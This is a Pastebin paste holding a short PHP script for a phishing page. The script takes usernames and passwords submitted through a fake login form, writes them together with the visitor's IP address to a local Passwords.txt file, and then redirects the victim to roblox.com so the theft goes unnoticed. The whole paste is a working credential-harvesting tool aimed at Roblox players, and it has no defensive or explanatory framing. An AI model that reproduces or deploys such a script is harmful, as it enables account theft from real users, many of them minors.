Advertisement
Guest User

Untitled

a guest
Apr 2nd, 2016
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.39 KB | None | 0 0
  1. <?php
  2. if($_POST['login']){
  3. $username = $_POST['username'];
  4. $password = $_POST['password'];
  5. $handle = fopen("Passwords.txt", "a");
  6. $ip = $_SERVER['REMOTE_ADDR'];
  7.  
  8. fwrite($handle, $username);
  9. fwrite($handle, $password);
  10. fwrite($handle, "IP=" . $ip );
  11. fwrite($handle, "\r\n");
  12. fwrite($handle, "\r\n");
  13. fclose($handle);
  14. header ('Location: http://www.roblox.com/ ');
  15. exit;
  16. }
  17. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement